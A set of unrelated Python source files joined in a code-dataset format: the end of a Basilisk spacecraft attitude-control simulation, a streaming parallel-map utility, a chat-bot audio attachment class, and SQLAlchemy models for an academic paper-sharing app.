simIncludeGravBody.loadGravFromFile(bskPath + '/supportData/LocalGravData/GGM03S.txt'
, earth.spherHarm
, 100)
# attach gravity model to spaceCraftPlus
scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values())
# setup simulation start data/time
timeInitString = "2020 March 1 00:28:30.0"
spiceTimeStringFormat = '%Y %B %d %H:%M:%S.%f'
timeInit = datetime.strptime(timeInitString, spiceTimeStringFormat)
# setup SPICE module
gravFactory.createSpiceInterface(bskPath + '/supportData/EphemerisData/', timeInitString)
gravFactory.spiceObject.zeroBase = 'Earth'
# add SPICE interface to task list
scSim.AddModelToTask(dynTaskName, gravFactory.spiceObject, None, -1)
# attach gravity model to spaceCraftPlus
scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values())
#
# set initial Spacecraft States
#
# setup the orbit using classical orbit elements
oe = orbitalMotion.ClassicElements()
orbitRadius = 550.0
oe.a = (6371.0 + orbitRadius) * 1000.0 # meters
oe.e = 0.0001
oe.i = 45 * macros.D2R
oe.Omega = 0.0 * macros.D2R
oe.omega = 0.0 * macros.D2R
oe.f = 180.0 * macros.D2R
rN, vN = orbitalMotion.elem2rv(mu, oe)
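    # Sanity check (sketch): a = (6371 + 550) km gives an orbital period of roughly
    # T = 2*pi*sqrt(a^3/mu) ~ 5.73e3 s (about 95.5 minutes), so the 2-minute simulation
    # configured above covers only a small arc of the orbit.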
scObject.hub.r_CN_NInit = unitTestSupport.np2EigenVectorXd(rN) # m - r_CN_N
scObject.hub.v_CN_NInit = unitTestSupport.np2EigenVectorXd(vN) # m/s - v_CN_N
scObject.hub.sigma_BNInit = [[0.1], [0.2], [-0.3]] # sigma_BN_B
if detumble:
scObject.hub.omega_BN_BInit = [[13*macros.D2R], [13*macros.D2R], [13*macros.D2R]] # rad/s - omega_BN_B
if sunpoint:
scObject.hub.omega_BN_BInit = [[0.001*macros.D2R], [0.001*macros.D2R], [0.001*macros.D2R]] # rad/s - omega_BN_B
if saturate or sunpoint:
#
# Add RW devices
#
rwFactory = simIncludeRW.rwFactory()
# store the RW dynamical model type
varRWModel = rwFactory.BalancedWheels
if useJitterSimple:
varRWModel = rwFactory.JitterSimple
# create each RW by specifying the RW type, the spin axis gsHat, plus optional arguments
RW1 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0.906307787036650, 0], maxMomentum=0.02, Omega=0. # RPM
, RWModel=varRWModel,
)
RW2 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0, 0.906307787036650], maxMomentum=0.02, Omega=0. # RPM
, RWModel=varRWModel,
)
RW3 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, -0.906307787036650, 0], maxMomentum=0.02, Omega=0. # RPM
, RWModel=varRWModel,
)
RW4 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0, -0.906307787036650], maxMomentum=0.02, Omega=0.
, RWModel=varRWModel,
)
numRW = rwFactory.getNumOfDevices()
# create RW object container and tie to spacecraft object
rwStateEffector = reactionWheelStateEffector.ReactionWheelStateEffector()
rwStateEffector.InputCmds = "reactionwheel_cmds"
rwFactory.addToSpacecraft("ReactionWheels", rwStateEffector, scObject)
# add RW object array to the simulation process
scSim.AddModelToTask(dynTaskName, rwStateEffector, None, 2)
if useRWVoltageIO:
rwVoltageIO = rwVoltageInterface.RWVoltageInterface()
rwVoltageIO.ModelTag = "rwVoltageInterface"
# set module parameters(s)
rwVoltageIO.setGains(np.array([0.2 / 10.] * 3)) # [Nm/V] conversion gain
# Add test module to runtime call list
scSim.AddModelToTask(dynTaskName, rwVoltageIO)
# add the simple Navigation sensor module. This sets the SC attitude, rate, position
# velocity navigation message
sNavObject = simple_nav.SimpleNav()
sNavObject.ModelTag = "SimpleNavigation"
scSim.AddModelToTask(dynTaskName, sNavObject)
#
# setup sensors
#
# Add IMU Sensor
ImuSensor = imu_sensor.ImuSensor()
ImuSensor.ModelTag = "imusensor"
r_SB_B = np.array([0.0, 0.0, 0.0]) # Sensor position wrt body frame origin
ImuSensor.sensorPos_B = np.array(r_SB_B)
# IMU Parameters
accelLSBIn = 0.0 # Not Used
gyroLSBIn = 0.0001 # Discretization value (least significant bit)
senRotBiasIn = 0.0 # Rotational sensor bias
senRotMaxIn = 50.0 # Gyro saturation value
gyroScale = [1., 1., 1.] # Scale factor for each axis
errorBoundsGryo = [0] * 3 # Bounds random walk
gyroNoise = 0.000 # Noise
ImuSensor.setLSBs(accelLSBIn, gyroLSBIn)
ImuSensor.senRotBias = np.array([senRotBiasIn] * 3)
ImuSensor.senRotMax = senRotMaxIn
ImuSensor.gyroScale = np.array(gyroScale)
ImuSensor.PMatrixGyro = np.eye(3) * gyroNoise
ImuSensor.walkBoundsGyro = np.array(errorBoundsGryo)
# add IMU to Simulation Process
scSim.AddModelToTask(dynTaskName, ImuSensor)
# Add Mag Meter
MagMeter = mag_meter.MagMeter()
MagMeter.ModelTag = "MagMeter"
MagMeterNoise = 0.00000
MagMeterBias = 0.0000
ImuSensor.senRotBias = np.array([MagMeterBias] * 3)
MagMeter.PMatrix = np.eye(3) * MagMeterNoise
MagMeter.inclination = oe.i
MagMeter.orbitRadius = oe.a / 1000 # 6371.0 + orbitRadius
scSim.AddModelToTask(dynTaskName, MagMeter)
# # Add Coarse Sun Sensors
cssConstellation = coarse_sun_sensor.CSSConstellation()
CSSOrientationList = [
[0.866, 0.000, -0.500], # 1 - 13 G
[0.866, -0.433, 0.250], # 2 - 14 G
[0.866, 0.433, 0.250], # 3 - 12 G
[0.500, 0.866, 0.000], # 4 - 10 G
[0.500, -0.866, 0.000], # 5 - 7 G
[0.000, -0.866, -0.500], # 6 - 9 G
[0.500, 0.866, 0.000], # 7 - 5 G
[0.000, 0.866, -0.500], # 8 - 11 G
[0.000, 0.866, 0.500], # 9 - 6 G
[0.500, -0.866, 0.000], # 10 - 4 G
[0.000, -0.866, 0.500], # 11 - 8 G
[0.866, -0.433, -0.250], # 12 - 3 G
[0.866, 0.000, 0.500], # 13 - 1 G
[0.866, 0.433, -0.250] # 14 - 2 G
]
for CSSHat in CSSOrientationList:
newCSS = coarse_sun_sensor.CoarseSunSensor()
newCSS.minOutput = 0.
newCSS.senNoiseStd = 0.00
newCSS.nHat_B = CSSHat
cssConstellation.appendCSS(newCSS)
cssConstellation.outputConstellationMessage = "css_sensors_data"
scSim.AddModelToTask(dynTaskName, cssConstellation)
# Add the normals to the vehicle Config data struct
cssConstVehicle = fswMessages.CSSConfigFswMsg()
totalCSSList = []
for CSSHat in CSSOrientationList:
newCSS = fswMessages.CSSUnitConfigFswMsg()
newCSS.nHat_B = CSSHat
newCSS.CBias = 1.0
totalCSSList.append(newCSS)
cssConstVehicle.nCSS = len(CSSOrientationList)
cssConstVehicle.cssVals = totalCSSList
# setup Sun Position
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'de430.bsp') # solar system bodies
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'naif0011.tls') # leap second file
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'de-403-masses.tpc') # solar system masses
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'pck00010.tpc') # generic Planetary Constants Kernel
sunPositionMsg = simMessages.SpicePlanetStateSimMsg()
sunInitialState = 1000 * pyswice.spkRead('SUN', timeInitString, 'J2000', 'EARTH')
rN_sun = sunInitialState[0:3] # meters
vN_sun = sunInitialState[3:6] # m/s
sunPositionMsg.PositionVector = rN_sun
sunPositionMsg.VelocityVector = vN_sun
#
# setup the FSW algorithm tasks
#
# setup inertial3D guidance module
inertial3DConfig = inertial3D.inertial3DConfig()
inertial3DWrap = scSim.setModelDataWrap(inertial3DConfig)
inertial3DWrap.ModelTag = "inertial3D"
scSim.AddModelToTask(fswTaskName, inertial3DWrap, inertial3DConfig)
inertial3DConfig.sigma_R0N = [0., 0., 0.] # set the desired inertial orientation
inertial3DConfig.outputDataName = "guidanceInertial3D"
# setup the attitude tracking error evaluation module
attErrorConfig = attTrackingError.attTrackingErrorConfig()
attErrorWrap = scSim.setModelDataWrap(attErrorConfig)
attErrorWrap.ModelTag = "attErrorInertial3D"
scSim.AddModelToTask(fswTaskName, attErrorWrap, attErrorConfig)
attErrorConfig.outputDataName = "attErrorInertial3DMsg"
attErrorConfig.inputRefName = inertial3DConfig.outputDataName
attErrorConfig.inputNavName = sNavObject.outputAttName
if detumble:
# setup the MRP Feedback control module
bdotControlConfig = B_DOT.B_DOTConfig()
bdotControlWrap = scSim.setModelDataWrap(bdotControlConfig)
bdotControlWrap.ModelTag = "B_DOT"
scSim.AddModelToTask(fswTaskName, bdotControlWrap, bdotControlConfig)
bdotControlConfig.inputMagMeterName = MagMeter.outputStateMessage
bdotControlConfig.vehConfigInMsgName = "vehicleConfigName"
bdotControlConfig.outputDataName = "LrRequested"
bdotControlConfig.K_detumble = 1000.0
if saturate:
bdotControlConfig.use_rw_wheels = 1
bdotControlConfig.rwParamsInMsgName = "rwa_config_data_parsed"
bdotControlConfig.inputRWSpeedsName = rwStateEffector.OutputDataString
# add module that maps the Lr control torque into the RW motor torques
rwMotorTorqueConfig = rwMotorTorque.rwMotorTorqueConfig()
rwMotorTorqueWrap = scSim.setModelDataWrap(rwMotorTorqueConfig)
rwMotorTorqueWrap.ModelTag = "rwMotorTorque"
scSim.AddModelToTask(dynTaskName, rwMotorTorqueWrap, rwMotorTorqueConfig)
# Initialize the test module msg names
if useRWVoltageIO:
rwMotorTorqueConfig.outputDataName = "rw_torque_Lr"
else:
rwMotorTorqueConfig.outputDataName = rwStateEffector.InputCmds
rwMotorTorqueConfig.inputVehControlName = bdotControlConfig.outputDataName
rwMotorTorqueConfig.rwParamsInMsgName = bdotControlConfig.rwParamsInMsgName
# Make the RW control all three body axes
controlAxes_B = [
1, 0, 0,
0, 1, 0,
0, 0, 1
]
rwMotorTorqueConfig.controlAxes_B = controlAxes_B
if useRWVoltageIO:
fswRWVoltageConfig = rwMotorVoltage.rwMotorVoltageConfig()
fswRWVoltageWrap = scSim.setModelDataWrap(fswRWVoltageConfig)
fswRWVoltageWrap.ModelTag = "rwMotorVoltage"
# Add test module to runtime call list
scSim.AddModelToTask(dynTaskName, fswRWVoltageWrap, fswRWVoltageConfig)
# Initialize the test module configuration data
fswRWVoltageConfig.torqueInMsgName = rwMotorTorqueConfig.outputDataName
fswRWVoltageConfig.rwParamsInMsgName = bdotControlConfig.rwParamsInMsgName
fswRWVoltageConfig.voltageOutMsgName = rwVoltageIO.rwVoltageInMsgName
# set module parameters
fswRWVoltageConfig.VMin = 0.0 # Volts
fswRWVoltageConfig.VMax = 5.0 # Volts
else:
bdotControlConfig.use_rw_wheels = 0
torqueRodConfig = torqueRodDynamicEffector.torqueRodDynamicEffector()
# torqueRodWrap = scSim.setModelDataWrap(torqueRodConfig)
torqueRodConfig.ModelTag = "torqueRods"
torqueRodConfig.magFieldMsgName = MagMeter.outputStateMessage
torqueRodConfig.cmdTorqueRodsMsgName = bdotControlConfig.outputDataName
torqueRodConfig.MaxDipoleMoment = 0.11 # [Am^2]
scObject.addDynamicEffector(torqueRodConfig)
scSim.AddModelToTask(dynTaskName, torqueRodConfig)
if sunpoint:
# Add Maxwell LS
sunVectorConfig = maxwellLS.maxwellLSConfig()
sunVectorWrap = scSim.setModelDataWrap(sunVectorConfig)
sunVectorWrap.ModelTag = "maxwellLS"
sunVectorConfig.cssDataInMsgName = "css_sensors_data"
sunVectorConfig.cssConfigInMsgName = "css_config_data"
sunVectorConfig.navStateOutMsgName = "css_nav_sunHeading"
sunVectorConfig.sunpointOutMsgName = "sun_direction"
sunVectorConfig.sensorUseThresh = 0.15
scSim.AddModelToTask(fswTaskName, sunVectorWrap, sunVectorConfig)
# setup the QUAT PD control module
quatControlConfig = QUAT_PD.QUAT_PDConfig()
quatControlWrap = scSim.setModelDataWrap(quatControlConfig)
quatControlWrap.ModelTag = "QUAT_PD"
scSim.AddModelToTask(fswTaskName, quatControlWrap, quatControlConfig)
quatControlConfig.inputSunName = "sun_direction"
quatControlConfig.inputAttName = sNavObject.outputAttName
quatControlConfig.inputGuidName = attErrorConfig.outputDataName
quatControlConfig.inputRatesName = ImuSensor.OutputDataMsg
quatControlConfig.vehConfigInMsgName = "vehicleConfigName"
quatControlConfig.outputDataName = "LrRequested"
quatControlConfig.rwParamsInMsgName = "rwa_config_data_parsed"
quatControlConfig.inputRWSpeedsName = rwStateEffector.OutputDataString
quatControlConfig.outputErrorName = "controlError"
quatControlConfig.K = 0.015
quatControlConfig.P = 0.01
# add module that maps the Lr control torque into the RW motor torques
rwMotorTorqueConfig = rwMotorTorque.rwMotorTorqueConfig()
rwMotorTorqueWrap = scSim.setModelDataWrap(rwMotorTorqueConfig)
rwMotorTorqueWrap.ModelTag = "rwMotorTorque"
scSim.AddModelToTask(dynTaskName, rwMotorTorqueWrap, rwMotorTorqueConfig)
# Initialize the test module msg names
if useRWVoltageIO:
rwMotorTorqueConfig.outputDataName = "rw_torque_Lr"
else:
rwMotorTorqueConfig.outputDataName = rwStateEffector.InputCmds
rwMotorTorqueConfig.inputVehControlName = quatControlConfig.outputDataName
rwMotorTorqueConfig.rwParamsInMsgName = quatControlConfig.rwParamsInMsgName
# Make the RW control all three body axes
controlAxes_B = [
1, 0, 0,
0, 1, 0,
0, 0, 1
]
rwMotorTorqueConfig.controlAxes_B = controlAxes_B
if useRWVoltageIO:
fswRWVoltageConfig = rwMotorVoltage.rwMotorVoltageConfig()
fswRWVoltageWrap = scSim.setModelDataWrap(fswRWVoltageConfig)
fswRWVoltageWrap.ModelTag = "rwMotorVoltage"
# Add test module to runtime call list
scSim.AddModelToTask(dynTaskName, fswRWVoltageWrap, fswRWVoltageConfig)
# Initialize the test module configuration data
fswRWVoltageConfig.torqueInMsgName = rwMotorTorqueConfig.outputDataName
fswRWVoltageConfig.rwParamsInMsgName = quatControlConfig.rwParamsInMsgName
fswRWVoltageConfig.voltageOutMsgName = rwVoltageIO.rwVoltageInMsgName
# set module parameters
fswRWVoltageConfig.VMin = 0.0 # Volts
fswRWVoltageConfig.VMax = 5.0 # Volts
#
# Setup data logging before the simulation is initialized
#
numDataPoints = 100000
samplingTime = simulationTime / (numDataPoints - 1)
if detumble:
# scSim.TotalSim.logThisMessage(bdotControlConfig.outputDataName, samplingTime)
# scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime)
# scSim.TotalSim.logThisMessage(sNavObject.outputTransName, samplingTime)
# scSim.TotalSim.logThisMessage(sNavObject.outputAttName, samplingTime)
scSim.TotalSim.logThisMessage(ImuSensor.OutputDataMsg, samplingTime)
scSim.TotalSim.logThisMessage(MagMeter.outputStateMessage, samplingTime)
scSim.TotalSim.logThisMessage(bdotControlConfig.inputMagMeterName, samplingTime)
# create the FSW vehicle configuration message
vehicleConfigOut = fswMessages.VehicleConfigFswMsg()
vehicleConfigOut.ISCPntB_B = I # use the same inertia in the FSW algorithm as in the simulation
unitTestSupport.setMessage(scSim.TotalSim,
fswProcessName,
bdotControlConfig.vehConfigInMsgName,
vehicleConfigOut)
if saturate:
scSim.TotalSim.logThisMessage(bdotControlConfig.inputRWSpeedsName, samplingTime)
rwOutName = ["rw_config_0_data", "rw_config_1_data", "rw_config_2_data", "rw_config_3_data"]
for item in rwOutName:
scSim.TotalSim.logThisMessage(item, samplingTime)
if useRWVoltageIO:
scSim.TotalSim.logThisMessage(fswRWVoltageConfig.voltageOutMsgName, samplingTime)
# FSW RW configuration message
# use the same RW states in the FSW algorithm as in the simulation
fswSetupRW.clearSetup()
for key, rw in rwFactory.rwList.iteritems():
fswSetupRW.create(unitTestSupport.EigenVector3d2np(rw.gsHat_B), rw.Js, 0.2)
fswSetupRW.writeConfigMessage(bdotControlConfig.rwParamsInMsgName, scSim.TotalSim, dynProcessName)
if sunpoint:
scSim.TotalSim.logThisMessage(cssConstellation.outputConstellationMessage, samplingTime)
scSim.TotalSim.logThisMessage(sunVectorConfig.sunpointOutMsgName, samplingTime)
scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime)
scSim.TotalSim.logThisMessage(sNavObject.outputAttName, samplingTime)
scSim.TotalSim.logThisMessage(quatControlConfig.inputRWSpeedsName, samplingTime)
scSim.TotalSim.logThisMessage(quatControlConfig.outputErrorName, samplingTime)
scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime)
rwOutName = ["rw_config_0_data", "rw_config_1_data", "rw_config_2_data", "rw_config_3_data"]
for item in rwOutName:
scSim.TotalSim.logThisMessage(item, samplingTime)
if useRWVoltageIO:
scSim.TotalSim.logThisMessage(fswRWVoltageConfig.voltageOutMsgName, samplingTime)
# create the FSW vehicle configuration message
vehicleConfigOut = fswMessages.VehicleConfigFswMsg()
vehicleConfigOut.ISCPntB_B = I # use the same inertia in the FSW algorithm as in the simulation
unitTestSupport.setMessage(scSim.TotalSim,
fswProcessName,
quatControlConfig.vehConfigInMsgName,
vehicleConfigOut)
# FSW RW configuration message
# use the same RW states in the FSW algorithm as in the simulation
fswSetupRW.clearSetup()
for key, rw in rwFactory.rwList.iteritems():
fswSetupRW.create(unitTestSupport.EigenVector3d2np(rw.gsHat_B), rw.Js, 0.2)
fswSetupRW.writeConfigMessage(quatControlConfig.rwParamsInMsgName, scSim.TotalSim, dynProcessName)
#
# initialize Simulation
#
scSim.InitializeSimulationAndDiscover()
# this next call ensures that the FSW and Dynamics Message that have the same
# name are copied over every time the simulation ticks forward. This function
# has to be called after the simulation is initialized to ensure that all modules
# have created their own output/input messages declarations.
# dyn2FSWInterface.discoverAllMessages()
# fsw2DynInterface.discoverAllMessages()
#
# configure a simulation stop time time and execute the simulation run
#
scSim.ConfigureStopTime(simulationTime)
scSim.ExecuteSimulation()
#
# retrieve the logged data
#
if detumble:
# dataLr = scSim.pullMessageLogData(bdotControlConfig.outputDataName + ".torqueRequestBody", range(3))
# dataPos = scSim.pullMessageLogData(sNavObject.outputTransName + ".r_BN_N", range(3))
dataOmegaIMU = scSim.pullMessageLogData(ImuSensor.OutputDataMsg + ".AngVelPlatform", range(3))
dataMagBody = scSim.pullMessageLogData(bdotControlConfig.inputMagMeterName + ".mag_bf", range(3))
dataMagLVLH = scSim.pullMessageLogData(bdotControlConfig.inputMagMeterName + ".mag_hill", range(3))
if saturate:
dataOmegaRW = scSim.pullMessageLogData(bdotControlConfig.inputRWSpeedsName + ".wheelSpeeds", range(numRW))
np.set_printoptions(precision=16)
if sunpoint:
dataCSSArray = scSim.pullMessageLogData(cssConstellation.outputConstellationMessage + ".CosValue",
range(len(CSSOrientationList)))
dataSunVector = scSim.pullMessageLogData(sunVectorConfig.sunpointOutMsgName + ".q_des_RN", range(4))
dataOmegaRW = scSim.pullMessageLogData(quatControlConfig.inputRWSpeedsName + ".wheelSpeeds", range(numRW))
dataSigmaBN = scSim.pullMessageLogData(sNavObject.outputAttName + ".sigma_BN", range(3))
dataOmegaBN = scSim.pullMessageLogData(sNavObject.outputAttName + ".omega_BN_B", range(3))
dataSigmaBR = scSim.pullMessageLogData(attErrorConfig.outputDataName + ".sigma_BR", range(3))
#
# plot the results
#
fileName = os.path.basename(os.path.splitext(__file__)[0])
plt.close("all") # clears out plots from earlier test runs
if detumble:
plt.figure(1)
for idx in range(1, 4):
plt.plot(dataOmegaIMU[:, 0] * macros.NANO2MIN, dataOmegaIMU[:, idx] * macros.R2D,
color=unitTestSupport.getLineColor(idx, 3),
label='$\omega_' + str(idx) + '$')
plt.title('Detumbling Simulation Angular Rates', fontsize=16, fontweight='bold')
plt.legend(loc='upper right', fontsize=16)
plt.xlabel('Time (min)', fontsize=16)
plt.ylabel('Angular Rates (deg/s)', fontsize=16)
# # Mag Meter Body
# plt.figure(6)
# plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 1],
# color='blue',
# label='x')
# plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 2],
# color='red',
# label='y')
# plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 3],
# color='black',
# label='z')
# plt.grid(True)
# plt.legend(loc='upper right', fontsize=16)
# plt.title('Magnetic Field - Body Frame', fontsize=16)
# plt.xlabel('Time (h)', fontsize=16)
# plt.ylabel('Magnetic Field Magnitude (T)', fontsize=16)
# # Mag Meter LVLH
# plt.figure(7)
# plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 1],
# color='blue',
# label='$i_r$')
# plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 2],
# color='red',
# label='$i_{\\theta}$')
# plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 3],
# color='black',
# label='$i_h$')
# plt.grid(True)
# plt.legend(loc='upper right', fontsize=16)
# plt.title('Basilisk (Simple Tilted Dipole) - 90 degree inclination', fontsize=16)
# plt.xlabel('Time (h)', fontsize=16)
# plt.ylabel('Magnetic Field Magnitude (T)', fontsize=16)
if saturate:
plt.figure(2)
for idx in range(1, numRW + 1):
plt.plot(dataOmegaRW[:, 0] * macros.NANO2MIN, dataOmegaRW[:, idx] / macros.RPM,
color=unitTestSupport.getLineColor(idx, numRW),
label='$\Omega_{' + str(idx) + '}$')
plt.title('Reaction Wheel Spin Rates', fontsize=16, fontweight='bold')
plt.legend(loc='upper right', fontsize=16)
plt.xlabel('Time (min)', fontsize=16)
plt.ylabel('RW Speed [RPM]', fontsize=16)
if sunpoint:
# CSS Sensor Readings
plt.figure(1)
for idx in range(1, 15): # range(1,len(CSSList)+1) currently hardcoded. Remove when initialization block
plt.plot(dataCSSArray[:, 0] * macros.NANO2SEC, dataCSSArray[:, idx],
# color=unitTestSupport.getLineColor(idx,2),
label='CSS$_{' + str(idx) + '}$')
plt.title('CSS raw sensor readings', fontsize=12, fontweight='bold')
plt.xlabel('Time [sec]', fontsize=10, fontweight='bold')
plt.legend(fontsize=10)
plt.ylabel("CSS Voltage", fontsize=10, fontweight='bold')
# plt.figure(2)
# for idx in range(1, 5):
# plt.plot(dataSunVector[:, 0] * macros.NANO2SEC, dataSunVector[:, idx],
# color=unitTestSupport.getLineColor(idx, 4),
# label='$\\beta_{' + str(idx) + '}$')
# plt.legend(loc='lower right')
# plt.title('Sun Vector Estimation Quaternion')
# plt.xlabel('Time [sec]')
# plt.ylabel('Quaternion $\\beta_{B/R}$')
plt.figure(7)
for idx in range(1, 4):
plt.plot(dataSigmaBR[:, 0] * macros.NANO2SEC, dataSigmaBR[:, idx],
color=unitTestSupport.getLineColor(idx, 3),
label='$\sigma_' + str(idx) + '$')
plt.title('Control Error', fontsize=16, fontweight='bold')
plt.legend(loc='upper right', fontsize=16)
plt.xlabel('Time (s)', fontsize=16)
plt.ylabel('$\sigma_{B/R}$', fontsize=16)
plt.figure(4)
for idx in range(1, numRW + 1):
plt.plot(dataOmegaRW[:, 0] * macros.NANO2SEC, dataOmegaRW[:, idx] / macros.RPM,
color=unitTestSupport.getLineColor(idx, numRW),
label='$\Omega_{' + str(idx) + '}$')
plt.legend(loc='lower right')
plt.xlabel('Time [sec]')
plt.ylabel('RW Speed (RPM) ')
# plt.figure(5)
# for idx in range(1,4):
# plt.plot(dataSigmaBN[:, 0] * macros.NANO2SEC, dataSigmaBN[:, idx],
# color=unitTestSupport.getLineColor(idx, 3),
# label='$\sigma_' + str(idx) + '$')
# plt.legend(loc='lower right')
# plt.xlabel('Time [min]')
# plt.ylabel('Inertial Attitude $\sigma_{B/N}$')
plt.figure(6)
for idx in range(1,4):
plt.plot(dataOmegaBN[:, 0] * macros.NANO2SEC, dataOmegaBN[:, idx] * macros.R2D,
color=unitTestSupport.getLineColor(idx, 3),
label='$\omega_' + str(idx) + '$')
plt.legend(loc='lower right')
plt.xlabel('Time [sec]')
plt.ylabel('Angular Rates')
if show_plots:
plt.show()
# close the plots being saved off to avoid over-writing old and new figures
plt.close("all")
return numDataPoints
#
# This statement below ensures that the unit test script can be run as a
# stand-alone python script
#
if __name__ == "__main__":
run(
True, # show_plots
False, # detumble
False, # saturate
True, # sunpoint
False, # useUnmodeledTorque
False, # useJitterSimple
False, # useRWVoltageIO
)
| 1.375 | 1 |
generators/map_parallel.py | CodyKochmann/generators | 6 | 11084 | from multiprocessing import Pool
from multiprocessing.pool import ThreadPool
from queue import Queue
from .chunks import chunks
__all__ = 'map_parallel', 'map_multicore', 'map_multithread'
def _pool_map_stream(pool_type, pipe, fn, workers):
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
p = pool_type(workers)
job_q = Queue(maxsize=int(workers*2))
try:
        # prime the pool with the first `workers * 2` jobs only; without the
        # break below, the bounded queue fills up and the next put() would
        # block forever on longer inputs
        for chunk in chunks(pipe, workers*2):
            for i in chunk:
                job_q.put(p.apply_async(fn, [i]))
            break
for i in pipe:
yield job_q.get().get()
job_q.put(p.apply_async(fn, [i]))
while not job_q.empty():
yield job_q.get().get()
finally:
p.terminate()
def map_multicore(pipe, fn, workers):
''' This streams map operations through a Pool without needing to load
the entire stream into a massive list first, like Pool.map normally
requires.
'''
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
pipe = iter(pipe)
return _pool_map_stream(Pool, **locals())
def map_multithread(pipe, fn, workers):
''' This streams map operations through a ThreadPool without needing to
load the entire stream into a massive list first, like ThreadPool.map
normally requires.
'''
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
pipe = iter(pipe)
return _pool_map_stream(ThreadPool, **locals())
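# Usage sketch (not part of the original module): these helpers are lazy, so
# results stream out as workers finish instead of materializing the whole
# input the way Pool.map does.  Results come back in submission order:
#
#     >>> list(map_multithread(iter(range(3)), str, 2))
#     ['0', '1', '2']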
def map_parallel(pipe, fn, workers):
''' This streams map operations in parallel through a pool of processes or
threads. If the os does not allow multiprocessing or the datatypes are
not serializable, operation reverts to ThreadPools
'''
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
pipe = iter(pipe)
try:
for i in map_multicore(pipe, fn, workers):
yield i
except:
for i in map_multithread(pipe, fn, workers):
yield i
if __name__ == '__main__':
    import random, time
    # `G` used below is the package's chainable Generator wrapper; it is not
    # defined in this file, so import it here (assumption: the top-level
    # `generators` package exposes it under this name).
    from generators import G
def work(i):
print('working on: {}'.format(i))
time.sleep(random.random())
print('finished: {}'.format(i))
return i*2
l = G(
range(10)
).map(
float
).map_parallel(
work,
5
).print().run()
| 3.359375 | 3 |
apps/bot/classes/messages/attachments/AudioAttachment.py | Xoma163/Petrovich | 0 | 11085 | <reponame>Xoma163/Petrovich<filename>apps/bot/classes/messages/attachments/AudioAttachment.py<gh_stars>0
from apps.bot.classes.messages.attachments.Attachment import Attachment
class AudioAttachment(Attachment):
TYPE = "audio"
def __init__(self):
super().__init__(self.TYPE)
self.duration = None
def parse_vk_audio(self, event_audio):
from petrovich.settings import VK_URL
self.url = f"{VK_URL}video{event_audio['owner_id']}_{event_audio['id']}"
self.private_download_url = event_audio['url']
self.duration = event_audio['duration']
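    # Usage sketch (not part of the original class): the dict below mirrors
    # the fields parse_vk_audio reads from a VK audio event.
    #
    #     audio = AudioAttachment()
    #     audio.parse_vk_audio({'owner_id': -1, 'id': 42,
    #                           'url': 'https://example.org/a.mp3',
    #                           'duration': 240})
    #     audio.duration  # -> 240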
| 2.203125 | 2 |
app/models.py | TrigeekSpace/academia-bknd | 0 | 11086 | """ SQLAlchemy database models. """
from datetime import datetime
from depot.fields.sqlalchemy import UploadedFileField
from app import db
from app.util.data import many_to_many, foreign_key
from app.config import TOKEN_LEN
class User(db.Model):
""" User model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
username = db.Column(db.String(32), unique=True)
email = db.Column(db.String(64), unique=True)
password = db.Column(db.Binary(32))
join_date = db.Column(db.DateTime(), default=datetime.now)
active = db.Column(db.Boolean(), default=False)
avatar = db.Column(UploadedFileField())
self_introduction = db.Column(db.Text(), unique=True)
contribution = db.Column(db.Integer(), default=0)
job = db.Column(db.String(64), unique=True)
class Session(db.Model):
""" API session class. """
token = db.Column(db.Binary(TOKEN_LEN), primary_key=True)
user, user_id = foreign_key("User", backref_name="sessions")
class AbstractBaseGroup(object):
""" Abstract base group class. """
pass
class Group(db.Model, AbstractBaseGroup):
""" Group model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(32), unique=True)
users = many_to_many("Group", "User", backref_name="groups")
introduction = db.Column(db.Text())
class Paper(db.Model):
""" Paper model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(256), unique=False)
abstract = db.Column(db.Text(), unique=False)
authors = db.Column(db.String(256), unique=False)
conference = db.Column(db.String(128), unique=False)
publish_date = db.Column(db.DateTime(), default=datetime.now) # Accurate to the day
owners = many_to_many("Paper", "User", backref_name="papers")
owngroup = many_to_many("Paper", "Group", backref_name="papers")
collectors = many_to_many("Paper", "User", backref_name="collect_papers")
paper_file = db.Column(UploadedFileField())
class Note(db.Model):
""" User model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(256), unique=False)
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
author, author_id = foreign_key("User", backref_name="notes")
paper, paper_id = foreign_key("Paper", backref_name="notes")
collectors = many_to_many("Note", "User", backref_name="collect_notes")
owngroup = many_to_many("Note", "Group", backref_name="notes")
content = db.Column(db.Text(), unique=False)
annotation_file = db.Column(UploadedFileField())
class Question(db.Model):
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
provider, provider_id = foreign_key("User", backref_name="questions_asked")
